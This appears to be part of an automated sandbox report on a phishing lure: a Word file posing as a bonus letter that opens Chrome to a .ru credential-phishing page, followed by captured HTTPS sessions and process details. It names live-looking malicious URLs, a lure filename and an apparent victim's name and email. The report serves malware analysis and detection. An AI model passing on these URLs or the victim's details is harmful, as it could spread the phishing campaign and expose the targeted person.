                                                                            Data Ascii: cf-chl-out-s: GTH/leIgkNvRXXbt8tgAqMthVGXZWY4IUx9O6niV1P3GYCW6HysD+8DkRDWvwqDnOiQwo9SMCOEKPEMLTlSOVL+PhlOBSJc4t2Wi+JEigcpzU5XnnZlCPSxmK45KWnHhh3fabucS0U9PiIpgpOSRo7PtpXlaa4ZKeFXqHstWuBaHMCS4SQUM219NcqC8v7ojdldwqoe3HxwCkhaok0R4WaO+n7Vs5eJ/+i/7ZaXNqdgjqAmqm
                                                                            2024-12-19 14:37:38 UTC1193INData Raw: 58 47 32 42 66 47 68 6c 68 57 4f 55 67 4a 56 68 6b 6d 64 31 61 32 71 55 69 6d 6c 68 65 33 64 64 5a 4a 57 42 6f 6e 78 30 62 47 6c 6b 72 34 43 45 67 4b 4f 6f 67 37 61 73 74 71 75 6b 6e 48 57 64 71 4b 42 35 74 62 69 34 6b 72 53 33 76 62 36 38 79 70 71 2b 76 62 2b 68 6f 72 37 48 70 4a 47 73 78 4d 36 58 78 38 66 56 6c 39 50 61 73 72 61 62 32 73 79 30 6e 2b 61 32 34 74 58 61 34 39 54 42 33 71 76 6f 32 38 4c 6c 37 62 44 73 7a 2b 72 6d 78 66 65 33 37 73 2f 2b 76 2f 54 4e 41 73 48 30 33 4e 44 6c 42 64 4f 39 2b 74 6e 57 44 67 6f 53 32 39 76 76 7a 74 58 75 36 52 54 7a 43 68 51 59 33 41 33 65 48 65 49 68 4a 68 66 59 39 77 67 46 2b 53 54 6c 49 50 59 52 45 75 38 67 4b 77 37 31 4d 53 4d 50 46 66 41 54 4c 78 73 53 48 66 76 33 49 52 6b 67 41 52 78 49 4e 77 59 35 53 51 30
                                                                            Data Ascii: XG2BfGhlhWOUgJVhkmd1a2qUimlhe3ddZJWBonx0bGlkr4CEgKOog7astquknHWdqKB5tbi4krS3vb68ypq+vb+hor7HpJGsxM6Xx8fVl9Pasrab2sy0n+a24tXa49TB3qvo28Ll7bDsz+rmxfe37s/+v/TNAsH03NDlBdO9+tnWDgoS29vvztXu6RTzChQY3A3eHeIhJhfY9wgF+STlIPYREu8gKw71MSMPFfATLxsSHfv3IRkgARxINwY5SQ0
                                                                            2024-12-19 14:37:38 UTC1369INData Raw: 65 66 6f 79 64 4d 48 36 50 4d 44 36 65 7a 7a 39 41 62 7a 2b 64 2f 71 41 42 50 72 48 2f 58 30 43 43 55 42 39 42 37 70 44 41 77 71 35 78 48 70 42 41 77 51 4b 77 67 4c 42 51 55 46 4a 68 55 77 50 79 73 6a 52 43 38 58 4a 52 4a 47 41 52 34 39 51 69 4d 68 4b 30 34 4f 4b 55 46 43 4d 69 35 49 4d 46 51 37 4e 30 35 54 4b 54 30 38 4e 45 4d 63 54 6a 73 37 5a 53 67 39 52 79 49 6b 4e 30 6c 65 53 45 5a 51 54 6c 39 47 54 33 56 7a 52 31 6f 30 57 57 6c 52 58 48 39 4f 57 45 74 44 56 6c 4e 53 57 56 39 72 56 55 68 74 5a 55 5a 73 5a 57 70 76 59 57 42 7a 63 32 42 55 5a 58 68 35 63 6e 6c 57 63 57 74 31 66 34 57 45 66 58 53 45 66 59 65 70 5a 4a 36 42 5a 71 75 6b 68 58 36 79 73 49 79 6f 72 6f 32 52 68 36 61 34 6d 62 39 2f 64 35 61 31 73 37 57 63 6c 5a 57 52 71 71 61 70 6f 36 61 47
                                                                            Data Ascii: efoydMH6PMD6ezz9Abz+d/qABPrH/X0CCUB9B7pDAwq5xHpBAwQKwgLBQUFJhUwPysjRC8XJRJGAR49QiMhK04OKUFCMi5IMFQ7N05TKT08NEMcTjs7ZSg9RyIkN0leSEZQTl9GT3VzR1o0WWlRXH9OWEtDVlNSWV9rVUhtZUZsZWpvYWBzc2BUZXh5cnlWcWt1f4WEfXSEfYepZJ6BZqukhX6ysIyoro2Rh6a4mb9/d5a1s7WclZWRqqapo6aG
                                                                            2024-12-19 14:37:38 UTC1369INData Raw: 50 67 31 65 51 52 36 50 72 72 48 41 30 54 41 41 2f 56 2f 67 4c 36 43 65 67 61 4a 65 48 33 2b 75 54 34 36 79 41 4d 4c 77 72 73 4a 69 51 4c 4e 77 6b 4a 45 54 72 35 43 66 6f 53 47 52 59 6a 51 68 50 39 4b 67 5a 48 4b 79 51 49 53 6c 46 46 43 78 4a 46 51 6b 30 58 54 55 6b 54 44 55 56 52 47 42 45 37 54 42 78 6b 56 43 4e 4f 52 56 38 70 58 31 74 41 4a 57 35 45 4a 32 63 78 58 44 4d 75 51 6a 41 32 65 54 64 6e 4d 31 56 47 61 32 35 31 50 31 70 6a 50 6b 5a 50 5a 46 6c 4b 64 6f 4e 44 57 49 4e 71 57 57 61 52 61 46 39 33 65 49 52 56 65 70 61 4e 6a 31 71 5a 6e 5a 5a 63 6e 56 71 52 66 48 39 34 70 6e 36 71 68 36 65 4f 71 36 32 41 63 59 70 77 6c 49 69 30 6f 35 53 50 6b 6f 32 64 6c 49 78 2f 65 70 6d 32 73 6e 65 6e 70 4b 57 38 69 61 69 6e 78 4b 50 4d 73 4a 43 71 72 36 6d 67 74
                                                                            Data Ascii: Pg1eQR6PrrHA0TAA/V/gL6CegaJeH3+uT46yAMLwrsJiQLNwkJETr5CfoSGRYjQhP9KgZHKyQISlFFCxJFQk0XTUkTDUVRGBE7TBxkVCNORV8pX1tAJW5EJ2cxXDMuQjA2eTdnM1VGa251P1pjPkZPZFlKdoNDWINqWWaRaF93eIRVepaNj1qZnZZcnVqRfH94pn6qh6eOq62AcYpwlIi0o5SPko2dlIx/epm2snenpKW8iainxKPMsJCqr6mgt
                                                                            2024-12-19 14:37:38 UTC613INData Raw: 7a 36 2b 2f 59 39 66 41 42 2b 2b 51 6f 42 52 67 44 4c 43 6e 6d 41 77 77 6d 4d 42 45 52 42 51 4d 58 44 67 6b 4c 47 79 77 72 4c 42 4d 4c 49 45 41 66 44 7a 4d 52 49 69 45 32 42 43 55 45 48 53 34 6c 51 79 30 38 4d 52 35 56 44 69 6f 50 57 52 45 61 53 42 52 51 50 53 73 31 50 54 67 36 52 56 68 45 48 6c 4a 66 4b 69 4e 62 53 55 51 6e 4b 45 4a 4a 4b 6d 59 7a 55 30 56 49 4f 56 46 74 63 32 35 66 4e 30 77 39 57 33 5a 41 56 47 45 2f 57 56 5a 71 65 46 75 4d 62 46 78 64 59 48 4f 46 67 33 35 31 69 6c 65 59 65 31 46 35 5a 6c 74 72 63 4b 46 33 57 33 42 62 66 49 4a 39 6b 59 46 33 62 4a 61 43 5a 32 64 71 6b 61 65 68 73 35 4e 75 6a 32 75 53 71 49 32 4d 6c 70 71 33 6e 4a 75 4f 76 72 75 63 6b 36 44 4a 70 4a 69 48 6a 4b 57 49 6e 49 4f 50 73 4d 62 4e 71 34 32 55 70 4c 50 59 71 61
                                                                            Data Ascii: z6+/Y9fAB++QoBRgDLCnmAwwmMBERBQMXDgkLGywrLBMLIEAfDzMRIiE2BCUEHS4lQy08MR5VDioPWREaSBRQPSs1PTg6RVhEHlJfKiNbSUQnKEJJKmYzU0VIOVFtc25fN0w9W3ZAVGE/WVZqeFuMbFxdYHOFg351ileYe1F5ZltrcKF3W3BbfIJ9kYF3bJaCZ2dqkaehs5Nuj2uSqI2Mlpq3nJuOvruck6DJpJiHjKWInIOPsMbNq42UpLPYqa


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.1749752104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:37:40 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:37:40 UTC379INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 19 Dec 2024 14:37:40 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 7
                                                                            Connection: close
                                                                            cf-chl-out: I4/C4llV/uU4f3Bqbwpij5k5HhHRWjnRndk=$+N8A5uujZaTm+2Jd
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f4821c8eb8618f2-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:37:40 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                            Data Ascii: invalid


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.1749755172.67.134.1104436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:37:42 UTC650OUTGET /310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRN HTTP/1.1
                                                                            Host: vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://gs.quantumdhub.ru
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:37:43 UTC897INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:37:43 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ziRi1TZ%2B9W%2Fbl3HyH6BP%2BI1ehNArgFF%2Bkr8Ih3or9sacUYg3Z5R%2FyUQVquZkZuaglkUCEhXvehL20tUc4WReKQrCg%2FogIFMx8FMvJWIazBjW7vl1oIp9sbX2bKK24PQtY72uydzIlxRkblUxw93od6BMQlys2AbFimiTsdz8oHNryiaG%2F5DBvh90x4WvQf%2Fsew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f4821d3ca4d43bd-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1752&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1228&delivery_rate=1623123&cwnd=190&unsent_bytes=0&cid=69cb31b5cb5304c3&ts=1112&x=0"
                                                                            2024-12-19 14:37:43 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                            Data Ascii: 11
                                                                            2024-12-19 14:37:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.1749759172.67.134.1104436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:37:45 UTC442OUTGET /310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRN HTTP/1.1
                                                                            Host: vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:37:46 UTC895INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:37:46 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J08eCk43i11CnUzLNHFfLwG%2FMCNwRsgOJ0hOkbGzEDTfe09id1x7s%2FTrfqwZqP%2BWYJV59GjWsSpFfHd4nctw%2ByDpFFP48tPZe2F%2FjRDnLe3L%2BIK2NLkFlg2dHyLzVE6h3FMDyKJ0LyO4irqtnFwzajI07sct6i0WDq8%2Bi1KZjS3awK4IMNbG5cckMf42rsVCxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f4821eaee5b43c8-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1699&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1020&delivery_rate=1533613&cwnd=191&unsent_bytes=0&cid=522a31da0c00a449&ts=1144&x=0"
                                                                            2024-12-19 14:37:46 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                            Data Ascii: 11
                                                                            2024-12-19 14:37:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:09:36:03
                                                                            Start date:19/12/2024
                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Gioia Faggioli-End Of Year-Bonus.docx" /o ""
                                                                            Imagebase:0x6b0000
                                                                            File size:1'620'872 bytes
                                                                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:09:36:08
                                                                            Start date:19/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.com
                                                                            Imagebase:0x7ff7d6f10000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:09:36:09
                                                                            Start date:19/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1928,i,6146988213687095418,5572660784010154810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                            Imagebase:0x7ff7d6f10000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            No disassembly